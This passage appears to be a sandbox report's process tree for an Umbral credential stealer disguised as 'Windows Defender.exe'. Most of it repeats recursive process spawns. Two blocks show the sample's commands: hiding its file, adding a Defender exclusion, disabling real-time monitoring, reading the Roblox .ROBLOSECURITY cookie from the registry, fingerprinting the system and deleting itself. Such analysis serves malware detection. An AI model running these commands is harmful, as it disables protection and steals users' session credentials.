        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        182⤵
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        181⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        181⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        180⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        180⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        179⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        179⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        178⤵
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        178⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        177⤵
        
        PID:732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        178⤵
        
        PID:3036
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        178⤵
        Views/modifies file attributes
        
        PID:3432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        178⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        179⤵
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        178⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        178⤵
        
        PID:940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        178⤵
        
        PID:464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        178⤵
        
        PID:2952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        178⤵
        
        PID:1512
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        178⤵
        
        PID:2932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        178⤵
        
        PID:3168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        178⤵
        Detects videocard installed
        
        PID:1092
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        178⤵
        
        PID:3972
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        179⤵
        Runs ping.exe
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        177⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        176⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        176⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        175⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        175⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        174⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        174⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        173⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        173⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        172⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        172⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        171⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        171⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        170⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        170⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        169⤵
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        169⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        168⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        168⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        167⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        167⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        166⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        166⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        165⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        165⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        164⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        164⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        163⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        163⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        162⤵
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        162⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        161⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        161⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        160⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        160⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        159⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        159⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        158⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        158⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        157⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        157⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        156⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        156⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        155⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        155⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        154⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        154⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        153⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        153⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        152⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        152⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        151⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        151⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        150⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        150⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        149⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        149⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        148⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        148⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        147⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        147⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        146⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        146⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        145⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        145⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        144⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        144⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        143⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        143⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        142⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        142⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        141⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        141⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        140⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        140⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        139⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        139⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        138⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        138⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        137⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        137⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        136⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        136⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        135⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        135⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        134⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        134⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        133⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        133⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        132⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        132⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        131⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        131⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        130⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        130⤵
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        129⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        129⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        128⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        128⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        127⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        127⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        126⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        126⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        125⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        125⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        124⤵
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        124⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        123⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        123⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        122⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        122⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        121⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        121⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        120⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        120⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        119⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        119⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        118⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        118⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        117⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        117⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        116⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        116⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        115⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        115⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        114⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        114⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        113⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        113⤵
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        112⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        112⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        111⤵
        
        PID:3360
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        112⤵
        
        PID:4792
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        112⤵
        Views/modifies file attributes
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        112⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        112⤵
        
        PID:4948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        112⤵
        
        PID:4972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        112⤵
        
        PID:2272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        112⤵
        
        PID:4868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        112⤵
        
        PID:4144
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        112⤵
        
        PID:3220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        112⤵
        
        PID:4824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        112⤵
        Detects videocard installed
        
        PID:3872
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        112⤵
        
        PID:2956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        113⤵
        
        PID:2032
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        113⤵
        Runs ping.exe
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        111⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        110⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        110⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        109⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        109⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        108⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
